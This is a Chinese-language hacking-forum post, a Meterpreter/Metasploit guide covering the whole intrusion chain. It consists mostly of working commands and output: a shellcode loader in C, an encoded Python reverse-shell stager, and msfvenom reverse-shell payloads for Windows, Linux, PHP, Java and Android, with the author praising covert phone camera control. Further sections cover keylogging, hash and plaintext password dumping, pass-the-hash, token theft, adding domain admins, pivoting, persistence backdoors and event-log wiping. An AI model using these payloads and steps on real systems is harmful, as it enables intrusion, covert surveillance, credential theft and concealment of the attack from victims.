搜索
查看: 469|回复: 0

Meterpreter Guide

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-4-17 14:55:25 | 显示全部楼层 |阅读模式
转载备份


由于网上很多文章乱而不全或者过期了 所以打算噜这篇来做个笔记~ 方便自己以后查阅:)

0x01 入门篇(生成与接收)
功能介绍

msfpayload和msfencode已经被时代淘汰了现在都转为msfvenom了

  1. msfvenom命令行选项如下:
  2.     Options:
  3.         -p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
  4.         -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
  5.         -n, --nopsled    length>        为payload预先指定一个NOP滑动长度
  6.         -f, --format     format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
  7.      -e, --encoder    [encoder]       指定需要使用的encoder(编码器)
  8.         -a, --arch       architecture>  指定payload的目标架构
  9.             --platform   platform>      指定payload的目标平台
  10.         -s, --space      length>        设定有效攻击荷载的最大长度
  11.         -b, --bad-chars  list>          设定规避字符集,比如: '\x00\xff'
  12.         -i, --iterations count>         指定payload的编码次数
  13.         -c, --add-code   path>          指定一个附加的win32 shellcode文件
  14.         -x, --template   path>          指定一个自定义的可执行文件作为模板
  15.         -k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行
  16.             --payload-options            列举payload的标准选项
  17.         -o, --out   path>               保存payload
  18.         -v, --var-name name>            指定一个自定义的变量,以确定输出格式
  19.         --shellest                   最小化生成payload
  20.         -h, --help                       查看帮助选项
  21.         --help-formats               查看msf支持的输出格式列表
复制代码

查看一个Payload具体需要什么参数

  1. msfvenom -p windows/meterpreter/bind_tcp --payload-options

  2. Basic options:
  3. Name      Current Setting  Required  Description
  4. ----      ---------------  --------  -----------
  5. EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
  6. LPORT     4444             yes       The listen port
  7. RHOST                      no        The target address
复制代码

只示范reverse_tcp 大家可以根据各种不同的环境来选择Payload

reverse_http or bind_tcp ...

自己本地生成的bind_tcp的payload并不能在Windows机子上运行 (提示不是可用的Win32程序:(....)

如果大家也有遇到这种错误的话 推荐用msfvenom生成c的shellcode 然后自己编译为exe后运行:)

说不定还有以外的效果哦~

分享一个bind_tcp的栗子 (自行更改shelcode)

  1. #include "windows.h"
  2. #include "stdio.h"

  3. typedef void (_stdcall *CODE)();   

  4. unsigned char shellcode[] =
  5. "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
  6. "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
  7. "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
  8. "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
  9. "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
  10. "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
  11. "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
  12. "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
  13. "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
  14. "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
  15. "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
  16. "\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40"
  17. "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89"
  18. "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85\xc0\x75"
  19. "\x50\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1"
  20. "\xff\xd5\x97\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
  21. "\xd5\x83\xf8\x00\x7e\x2d\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
  22. "\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
  23. "\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x07\x01"
  24. "\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff"
  25. "\xd5";

  26. void RunShellCode()  
  27. {  
  28.     ( (void (*)(void))&shellcode )();  
  29. }  


  30. void main()  
  31. {  
  32.     RunShellCode();  
  33. }
复制代码

具体编码方式和编码次数大家可以自行改变:)

使用msfvenom --list可以查看所有的payload encoder nops...哦~~

生成Windows reverse_tcp payload

  1. msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=172.22.25.51 LPORT=23333 -f exe -o ~/Desktop/shell.exe
复制代码

or

  1. msfvenom -p windows/x64/meterpreter_reverse_tcp -e -i 3 LHOST=172.22.25.51 LPORT=23333 -f exe -o ~/Desktop/shell.exe
复制代码

生成Python reverse_tcp payload

  1. msfvenom -p python/meterpreter/reverse_tcp -e -i 3 LHOST=172.22.25.51  LPORT=23333
复制代码

生成出来的Python是可以直接解码来改IP的端口的 所以可以不用浪费时间生成payload 大家自行更改IP和端口~

  1. import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxNzIuMjIuMjUuNTEnLDIzMzMzKSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))
复制代码

生成java payload

  1. msfvenom -p java/meterpreter/reverse_tcp LHOST=10.42.0.1  LPORT=23333 -o ~/Desktop/123.jar
复制代码

生成php payload

  1. msfvenom -p  php/meterpreter_reverse_tcp LHOST=10.42.0.1  LPORT=23333 -o ~/Desktop/123.php
复制代码

生成Linux payload

  1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.42.0.1  LPORT=23333 -f elf -o ~/Desktop/123.elf
复制代码

生成Android的payload

  1. msfvenom -p android/meterpreter/reverse_tcp LHOST=10.42.0.1  LPORT=23333 -o ~/Desktop/1234.apk
复制代码
  1. use exploit/multi/handler
  2. set PAYLOAD <Payload name>
  3. set LHOST <LHOST value>
  4. set LPORT <LPORT value>
  5. set ExitOnSession false
  6. exploit -j -z
复制代码

生成后 手机点击app无任何反应 app就默默的后台运行 干啥都行:) so cool!偷偷控制手机摄像头!

接收

  1. msf > use multi/handler
  2. msf exploit(handler) > set payload android/meterpreter/reverse_tcp
  3. payload => android/meterpreter/reverse_tcp
  4. msf exploit(handler) > set LPORT 23333
  5. LPORT => 23333
  6. msf exploit(handler) > set LHOST 10.42.0.1
  7. LHOST => 10.42.0.1
  8. msf exploit(handler) > exploit
复制代码

0x02 Go on:)


基本命令:

  1. background  # 让meterpreter处于后台模式  
  2. sessions -i number   # 与会话进行交互,number表示第n个session  
  3. quit  # 退出会话  
  4. shell # 获得命令行
  5. cat c:\\boot.ini   # 查看文件内容  
  6. getwd # 查看当前工作目录 work directory  
  7. upload /root/Desktop/netcat.exe c:\\ # 上传文件到目标机上  
  8. download 0xfa.txt /root/Desktop/   # 下载文件到本机上  
  9. edit c:\\boot.ini  # 编辑文件  
  10. search -d d:\\www -f web.config # search 文件
  11. ps # 查看当前活跃进程  
  12. migrate  pid # 将Meterpreter会话移植到进程数位pid的进程中  
  13. execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互  
  14. getpid # 获取当前进程的pid  
  15. kill pid # 杀死进程  
  16. getuid # 查看权限  
  17. sysinfo # 查看目标机系统信息,如机器名,操作系统等  
  18. getsystem #提权操作
  19. timestompc:/a.doc -c "10/27/2015 14:22:11" #修改文件的创建时间
复制代码

迁移进程

  1. meterpreter > ps
复制代码

自行选择PID

  1. meterpreter > migrate pid
复制代码

提权操作

getsystem 大部分都会失败 他只尝试了4个Payload。

  1. meterpreter > getuid   
  2. Server username: Testing\Croxy   
  3. meterpreter > getsystem   
  4. [-] priv_elevate_getsystem: Operation failed: Access is denied.
复制代码

使用MS14-058之类的Exp进行提权

  1. meterpreter > background
  2. [*] Backgrounding session 3..
  3. msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu
  4. msf exploit(ms14_058_track_popup_menu) > set SESSION 3
复制代码

再也不用去网上找Exp来下载拉~:)

获取敏感信息(Windows版本 Linux自行选择)

  1. run post/windows/gather/checkvm #是否虚拟机
  2. run post/windows/gather/enum_applications #获取安装软件信息
  3. run post/windows/gather/dumplinks   #获取最近的文件操作
  4. run post/windows/gather/enum_ie  #获取IE缓存
  5. run post/windows/gather/enum_chrome   #获取Chrome缓存
  6. run scraper                      #获取常见信息
  7. #保存在~/.msf4/logs/scripts/scraper/目录下
复制代码

详细请参考 http://drops.wooyun.org/tips/9732

键盘记录

  1. meterpreter > keyscan_start
  2. Starting the keystroke sniffer...
  3. meterpreter > keyscan_dump
  4. Dumping captured keystrokes...
  5. dir <Return> cd  <Ctrl>  <LCtrl>
  6. meterpreter > keyscan_stop
  7. Stopping the keystroke sniffer...
复制代码

网络嗅探

  1. meterpreter > use sniffer
  2. Loading extension sniffer...success.
  3. meterpreter > sniffer_interfaces
  4.     1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
  5.     2 - 'Intel(R) PRO/1000 MT Desktop Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
  6.     3 - 'Cisco Systems VPN Adapter' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )
  7. meterpreter > sniffer_start 2
  8. [*] Capture started on interface 2 (50000 packet buffer)
  9. meterpreter > sniffer_dump 2 /tmp/test2.cap
  10. [*] Flushing packet capture buffer for interface 2...
  11. [*] Flushed 1176 packets (443692 bytes)
  12. [*] Downloaded 100% (443692/443692)...
  13. [*] Download completed, converting to PCAP...
  14. [*] PCAP file written to /tmp/test2.cap
复制代码

获取Hash

  1. meterpreter > run post/windows/gather/smart_hashdump
  2. [*] Running module against TESTING
  3. [*] Hashes will be saved to the database if one is connected.
  4. [*] Hashes will be saved in loot in JtR password file format to:
  5. [*] /home/croxy/.msf4/loot/20150929225044_default_10.0.2.15_windows.hashes_407551.txt
  6. [*] Dumping password hashes...
  7. [*] Running as SYSTEM extracting hashes from registry
  8. [*]     Obtaining the boot key...
  9. [*]     Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239...
  10. [*]     Obtaining the user list and keys...
  11. [*]     Decrypting user keys...
  12. [*]     Dumping password hints...
  13. [+]     Croxy:"Whoareyou"
  14. [*]     Dumping password hashes...
  15. [+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
  16. [+]     HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::
  17. [+]     test123:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::
复制代码

获取明文密码

  1. meterpreter > getuid
  2. Server username: NT AUTHORITY\SYSTEM   

  3. meterpreter > load mimikatz
  4. Loading extension mimikatz...success.
  5. meterpreter > msv
  6. [+] Running as SYSTEM
  7. [*] Retrieving msv credentials   

  8. meterpreter > kerberos
  9. [+] Running as SYSTEM
  10. [*] Retrieving kerberos credentials
  11. kerberos credentials
  12. ====================   

  13. meterpreter > mimikatz_command -f samdump::hashes
  14. Ordinateur : Testing
  15. BootKey    : 8c2c8d96e92a8ccfc407a1ca48531239   

  16. meterpreter > mimikatz_command -f sekurlsa::searchPasswords
  17. [0] { Croxy ; Testing ; hehe }
  18. [1] { test ; Testing ; test }
复制代码

通过Hash获取权限

  1. msf > use exploit/windows/smb/psexec
  2. msf exploit(psexec) > show options   

  3. Module options (exploit/windows/smb/psexec):   

  4. Name       Current Setting  Required  Description
  5. ----       ---------------  --------  -----------
  6. RHOST                       yes       The target address
  7. RPORT      445              yes       Set the SMB service port
  8. SHARE      ADMIN[        DISCUZ_CODE_59        ]nbsp;          yes       The share to connect to, can be an admi                                              n share

  9. (ADMIN$,C$,...) or a normal read/write folder share
  10. SMBDomain  WORKGROUP        no        The Windows domain to use for authentic                                                ation
  11. SMBPass                     no        The password for the specified username
  12. SMBUser                     no        The username to authenticate as   

  13. Exploit target:   

  14. Id  Name
  15. --  ----
  16. 0   Automatic   

  17. msf exploit(psexec) > set RHOST 192.168.0.254
  18. RHOST => 192.168.0.254
  19. msf exploit(psexec) > set SMBUser isosky
  20. SMBUser => isosky
  21. msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537   

  22. SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
  23. msf exploit(psexec) > exploit
  24. [*] Started reverse handler on 192.168.0.3:4444
  25. [*] Connecting to the server...
  26. [*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'isosky'...
  27. [*] Uploading payload...
  28. [*] Created \UGdecsam.exe...
  29. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
  30. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
  31. [*] Obtaining a service manager handle...
  32. [*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")...
  33. [*] Closing service handle...
  34. [*] Opening service...
  35. [*] Starting the service...
  36. [*] Removing the service...
  37. [*] Closing service handle...
  38. [*] Deleting \UGdecsam.exe...
  39. [*] Sending stage (749056 bytes) to 192.168.0.254
  40. [*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877) at 2011-07-19 03:57:17 +0800
复制代码

0x03 内网渗透


10.42.0.54为target

端口转发

  1. meterpreter > portfwd add -l 1234 -p 3389 -r 10.42.0.54
  2. [*] Local TCP relay created: 0.0.0.0:8081 <-> 10.42.0.54:80
复制代码

将远程主机3389端口转发到本地1234端口上

内网代理Windows

  1. meterpreter > run autoroute -s 10.42.0`.54
  2. [*] Adding a route to 10.42.0.54/255.255.255.0...
  3. [+] Added route to 10.42.0.54/255.255.255.0 via 10.42.0.54
  4. [*] Use the -p option to list all active routes
  5. meterpreter > background
  6. [*] Backgrounding session 1...
  7. msf exploit(handler) > use auxiliary/server/socks4a
  8. msf auxiliary(socks4a) > show options   

  9. Module options (auxiliary/server/socks4a):
  10. Name     Current Setting  Required  Description
  11. ----     ---------------  --------  -----------
  12. SRVHOST  0.0.0.0          yes       The address to listen on
  13. SRVPORT  1080             yes       The port to listen on.   

  14. Auxiliary action:
  15. Name   Description
  16. ----   -----------
  17. Proxy      

  18. msf auxiliary(socks4a) > route print
  19. Active Routing Table
  20. ====================
  21. Subnet             Netmask            Gateway
  22. ------             -------            -------
  23. 10.42.0.54         255.255.255.0      Session 1   

  24. msf auxiliary(socks4a) > ifconfig
  25. [*] exec: ifconfig   

  26. msf auxiliary(socks4a) > set SRVHOST xxx.xxx.xx.xx
  27. SRVHOST => xxx.xxx.xx.xx (xxx.xxx.xx.xx为自己运行msf的vps机子)   

  28. msf auxiliary(socks4a) > exploit
  29. [*] Auxiliary module execution completed
  30. [*] Starting the socks4a proxy server
复制代码

之后使用proxychains 设置socks4代理 链接vps上的1080端口 就可以访问内网了

SSH代理

  1. msf > load meta_ssh
  2. msf > use multi/ssh/login_password
  3. msf > set RHOST 192.168.56.3
  4. RHOST => 192.168.56.3
  5. msf > set USER test
  6. USER => test
  7. msf > set PASS reverse
  8. PASS => reverse
  9. msf > set PAYLOAD ssh/metassh_session
  10. PAYLOAD => ssh/metassh_session
  11. msf > exploit -z
  12. [*] Connecting to dsl@192.168.56.3:22 with password reverse
  13. [*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28   03:51:16 +1300
  14. [*] Session 1 created in the background.
  15. msf > route add 192.168.57.0 255.255.255.0 1
复制代码

之后就是愉快的内网扫描了

当然还是推荐直接用

  1. ssh -f -N -D 127.0.0.1:6666 [email protected]
复制代码

偷取Token

  1. meterpreter>ps #查看目标机器进程,找出域控账户运行的进程ID
  2. meterpreter>steal_token pid
复制代码

方法2

  1. meterpreter > getuid
  2. Server username: NT AUTHORITY\SYSTEM
  3. meterpreter > load incognito
  4. Loading extension incognito...success.
  5. meterpreter > list_tokens -u   

  6. Delegation Tokens Available
  7. ========================================
  8. IIS APPPOOL\zyk
  9. NT AUTHORITY\IUSR
  10. NT AUTHORITY\LOCAL SERVICE
  11. NT AUTHORITY\NETWORK SERVICE
  12. NT AUTHORITY\SYSTEM
  13. QLWEB\Administrator   

  14. Impersonation Tokens Available
  15. ========================================
  16. NT AUTHORITY\ANONYMOUS LOGON   

  17. meterpreter > impersonate_token QLWEB\\Administrator
  18. [+] Delegation token available
  19. [+] Successfully impersonated user QLWEB\Administrator
  20. meterpreter > getuid
  21. Server username: QLWEB\Administrator
  22. meterpreter>add_user 0xfa funny –h192.168.3.98  #在域控主机上添加账户
  23. meterpreter>add_group_user “DomainAdmins” 0xfa –h192.168.3.98   #将账户添加至域管理员组
复制代码

如果有了域控:) nidongde

内网扫描

  1. meterpreter > run autoroute -s 192.168.3.98
  2. meterpreter > background
  3. [*] Backgrounding session 2...
  4. msf exploit(handler) > use auxiliary/scanner/portscan/tcp
  5. msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306
  6. PORTS => 80,8080,21,22,3389,445,1433,3306
  7. msf auxiliary(tcp) > set RHOSTS 192.168.3.1/24
  8. RHOSTS => 192.168.3.1/24
  9. msf auxiliary(tcp) > set THERADS 10
  10. THERADS => 10
  11. msf auxiliary(tcp) > exploit
复制代码

我还是推荐开代理用Nmap扫描>.<

一些常用的破解模块

  1. auxiliary/scanner/mssql/mssql_login
  2. auxiliary/scanner/ftp/ftp_login
  3. auxiliary/scanner/ssh/ssh_login
  4. auxiliary/scanner/telnet/telnet_login
  5. auxiliary/scanner/smb/smb_login
  6. auxiliary/scanner/mssql/mssql_login
  7. auxiliary/scanner/mysql/mysql_login
  8. auxiliary/scanner/oracle/oracle_login
  9. auxiliary/scanner/postgres/postgres_login
  10. auxiliary/scanner/vnc/vnc_login
  11. auxiliary/scanner/pcanywhere/pcanywhere_login
  12. auxiliary/scanner/snmp/snmp_login
  13. auxiliary/scanner/ftp/anonymous
复制代码

一些好用的模块

  1. auxiliary/admin/realvnc_41_bypass  (Bypass VNCV4网上也有利用工具)
  2. auxiliary/admin/cisco/cisco_secure_acs_bypass (cisco Bypass 版本5.1或者未打补丁5.2版 洞略老)
  3. auxiliary/admin/http/jboss_deploymentfilerepository (内网遇到Jboss最爱:))
  4. auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令执行:)
  5. auxiliary/admin/mssql/mssql_exec (用爆破得到的sa弱口令进行执行命令 没回显:()
  6. auxiliary/scanner/http/jboss_vulnscan (Jboss 内网渗透的好朋友)
  7. auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令执行sql语句:)
  8. auxiliary/admin/oracle/post_exploitation/win32exec (爆破得到Oracle弱口令来Win32命令执行)
  9. auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用户来执行sql语句)
复制代码

还一些。。。。你懂的脚本 :)

  1. auxiliary/scanner/rsync/modules_list  (Rsync)
  2. auxiliary/scanner/misc/redis_server  (Redis)
  3. auxiliary/scanner/ssl/openssl_heartbleed (心脏滴血)
  4. auxiliary/scanner/mongodb/mongodb_login (Mongodb)
  5. auxiliary/scanner/elasticsearch/indices_enum (elasticsearch)
  6. auxiliary/scanner/http/axis_local_file_include (axis本地文件包含)
  7. auxiliary/scanner/http/http_put (http Put)
  8. auxiliary/scanner/http/gitlab_user_enum (获取内网gitlab用户)
  9. auxiliary/scanner/http/jenkins_enum (获取内网jenkins用户)
  10. auxiliary/scanner/http/svn_scanner (svn Hunter :))
  11. auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破)
  12. auxiliary/scanner/http/zabbix_login (Zabbix :))
复制代码

0x04 AfterWards?


后门:)

  1. 一个vbs后门 写入了开机启动项 但是容易被发现 还是需要大家发挥自己的智慧:)   

  2. meterpreter > run persistence -X -i 5 -p 23333 -r 10.42.0.1
  3. [*] Running Persistance Script
  4. [*] Resource file for cleanup created at /home/croxy/.msf4/logs/persistence/TESTING_20150930.3914/TESTING_20150930.3914.rc
  5. [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=23333
  6. [*] Persistent agent script is 148453 bytes long
  7. [+] Persistent Script written to C:\Users\Croxy\AppData\Local\Temp\ulZpjVBN.vbs
  8. [*] Executing script C:\Users\Croxy\AppData\Local\Temp\ulZpjVBN.vbs
  9. [+] Agent executed with PID 4140
  10. [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\okiASNRzcLenulr
  11. [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\okiASNRzcLenulr
复制代码

Meterpreter服务后门

  1. meterpreter > run metsvc
  2. [*] Creating a meterpreter service on port 31337
  3. [*] Creating a temporary installation directory C:\Users\Croxy\AppData\Local\Temp\tuIKWqmuO...
  4. [*]  >> Uploading metsrv.x86.dll...
  5. [*]  >> Uploading metsvc-server.exe...
  6. [*]  >> Uploading metsvc.exe...
  7. [*] Starting the service...
  8. * Installing service metsvc
  9. * Starting service
  10. * Service metsvc successfully installed.
复制代码

之后电脑就默默生成了一个自启服务Meterpreter

然后连接后门

  1. msf exploit(handler) > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/metsvc_bind_tcp
  3. payload => windows/metsvc_bind_tcp
  4. msf exploit(handler) > set RHOST 10.42.0.54
  5. RHOST => 10.42.0.54
  6. msf exploit(handler) > set LPORT 31337
  7. LPORT => 31337
  8. msf exploit(handler) > exploit
复制代码

清理痕迹:)

  1. meterpreter > clearev
  2. [*] Wiping 12348 records from Application...
  3. [*] Wiping 1345 records from System...
  4. [*] Wiping 3 records from Security...
复制代码

0x05 And So On...


Meterpreter太强大~

待续补充完整:)

不足请见谅:)

Thanks:


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表